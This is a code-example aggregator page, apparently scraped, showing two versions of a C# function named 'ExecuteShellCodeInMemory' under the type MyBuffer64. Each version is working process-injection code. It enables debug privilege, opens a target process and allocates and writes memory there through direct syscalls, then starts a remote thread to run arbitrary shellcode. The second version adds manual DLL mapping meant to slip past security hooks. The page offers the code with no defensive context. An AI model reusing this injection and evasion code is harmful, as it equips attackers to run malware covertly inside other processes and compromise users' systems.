C# (CSharp) MyBuffer64 Exemples

Langage de programmation: C# (CSharp)

Class/Type: MyBuffer64

Exemples au hotexamples.com: 2

C# (CSharp) MyBuffer64 - 2 exemples trouvés. Ce sont les exemples réels les mieux notés de MyBuffer64 extraits de projets open source. Vous pouvez noter les exemples pour nous aider à en améliorer la qualité.

Associées

ApplicationInformation

MetadataBlockingPolicy

NativeMethods.k4a_wait_result_t

SqlOutputParameterResult

ConsoleWriterConfiguration

RelationshipIfOther

RegistryTextRegex

OhmViewModel

SIZE_DIRECTION

SQLiteMarkerStorage

Related in langs

Users (PHP)

csv_quote (PHP)

aix_nolabel (C++)

sample_tile (C++)

Int32 (Go)

RegisterContainerDropData (Go)

ClanTable (Java)

GeoPos (Java)

Repeater (Python)

remove_shapefile (Python)

Exemple #1

0

Afficher le fichier

private static unsafe void ExecuteShellCodeInMemory(object args) { var parameterArguments = (object[])args; var sc = (byte[])parameterArguments[0]; var sysCall = (SysCallManager)parameterArguments[1]; var pid = (int)parameterArguments[2]; var handle = Process.GetCurrentProcess().Handle; if (pid != -1) { var token = IntPtr.Zero; Utils.GetProcessToken(Process.GetCurrentProcess().Handle, Utils.TokenAccessFlags.TokenAdjustPrivileges, out token, sysCall); var l = new List <string>(); l.Add("SeDebugPrivilege"); Utils.EnablePrivileges(token, l); Utils.GetProcessHandle(pid, out handle, Utils.ProcessAccessFlags.CreateThread | Utils.ProcessAccessFlags.QueryInformation | Utils.ProcessAccessFlags.VirtualMemoryOperation | Utils.ProcessAccessFlags.VirtualMemoryWrite | Utils.ProcessAccessFlags.VirtualMemoryRead, sysCall); } try { var baseAddress = IntPtr.Zero; var shellCode = sysCall.GetSysCallAsm("NtAllocateVirtualMemory"); var shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, AllocationType.Reserve | AllocationType.Commit, MemoryProtection.ExecuteReadwrite); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtAllocateVirtualMemory)); var arguments = new object[] { handle, baseAddress, (uint)0, (UIntPtr)(sc.Length + 1), AllocationType.Reserve | AllocationType.Commit, MemoryProtection.ExecuteReadwrite }; var returnValue = sysCallDelegate.DynamicInvoke(arguments); if ((int)returnValue != 0) { return; } baseAddress = (IntPtr)arguments[1]; //required! shellCode = sysCall.GetSysCallAsm("NtWriteVirtualMemory"); shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, AllocationType.Reserve | AllocationType.Commit, MemoryProtection.ExecuteReadwrite); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtWriteVirtualMemory)); arguments = new object[] { handle, baseAddress, sc, (UIntPtr)(sc.Length + 1), IntPtr.Zero }; returnValue = sysCallDelegate.DynamicInvoke(arguments); baseAddress = (IntPtr)arguments[1]; if ((int)returnValue != 0) { return; } var a = new MyBuffer64(); var b = new MyBuffer64(); var u = new Unknown64(); u.Size = (uint)Marshal.SizeOf(u); u.Unknown1 = 65539; u.Unknown2 = 16; u.UnknownPtr = &a; u.Unknown4 = 65540; u.Unknown5 = 8; u.Unknown6 = 0; u.UnknownPtr2 = &b; u.Unknown3 = 0; shellCode = sysCall.GetSysCallAsm("NtCreateThreadEx"); shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, AllocationType.Reserve | AllocationType.Commit, MemoryProtection.ExecuteReadwrite); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtCreateThreadEx64)); arguments = new object[] { IntPtr.Zero, 0x001FFFFF, IntPtr.Zero, handle, baseAddress, IntPtr.Zero, false, (ulong)0, (ulong)0, (ulong)0, u }; returnValue = sysCallDelegate.DynamicInvoke(arguments); } catch { } }

Exemple #2

0

Afficher le fichier

private static unsafe void ExecuteShellCodeInMemory(object args) { var parameterArguments = (object[])args; var sc = (byte[])parameterArguments[0]; var sysCall = (SysCallManager)parameterArguments[1]; var pid = (int)parameterArguments[2]; var handle = Process.GetCurrentProcess().Handle; if (pid != -1) { var token = IntPtr.Zero; Utils.GetProcessToken(Process.GetCurrentProcess().Handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS.TokenAdjustPrivileges, out token, sysCall); var l = new List <string>(); l.Add("SeDebugPrivilege"); Utils.EnablePrivileges(token, l, sysCall); Utils.GetProcessHandle(pid, out handle, DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_CREATE_THREAD | DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_QUERY_INFORMATION | DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_OPERATION | DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_WRITE | DInvoke.Win32.Kernel32.ProcessAccessFlags.PROCESS_VM_READ, sysCall); } try { var baseAddress = IntPtr.Zero; var shellCode = sysCall.GetSysCallAsm("NtAllocateVirtualMemory"); DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll"); object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite }; var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtAllocateVirtualMemory)); var arguments = new object[] { handle, baseAddress, (uint)0, (UIntPtr)(sc.Length + 1), DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteReadWrite }; uint oldProtect = 0; object[] parameters = { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect }; IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); var returnValue = sysCallDelegate.DynamicInvoke(arguments); if ((int)returnValue != 0) { return; } baseAddress = (IntPtr)arguments[1]; shellCode = sysCall.GetSysCallAsm("NtWriteVirtualMemory"); object[] virtualAlloc2 = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite }; shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc2); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtWriteVirtualMemory)); arguments = new object[] { handle, baseAddress, sc, (UIntPtr)(sc.Length + 1), IntPtr.Zero }; parameters = new object[] { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect }; response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); returnValue = sysCallDelegate.DynamicInvoke(arguments); baseAddress = (IntPtr)arguments[1]; if ((int)returnValue != 0) { return; } var a = new MyBuffer64(); var b = new MyBuffer64(); var u = new Unknown64(); u.Size = (uint)Marshal.SizeOf(u); u.Unknown1 = 65539; u.Unknown2 = 16; u.UnknownPtr = &a; u.Unknown4 = 65540; u.Unknown5 = 8; u.Unknown6 = 0; u.UnknownPtr2 = &b; u.Unknown3 = 0; shellCode = sysCall.GetSysCallAsm("NtCreateThreadEx"); object[] virtualAlloc3 = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve, DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite }; shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc", typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc3); Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length); sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtCreateThreadEx64)); arguments = new object[] { IntPtr.Zero, 0x001FFFFF, IntPtr.Zero, handle, baseAddress, IntPtr.Zero, false, (ulong)0, (ulong)0, (ulong)0, u }; parameters = new object[] { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect }; response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx", typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters); returnValue = sysCallDelegate.DynamicInvoke(arguments); } catch { } }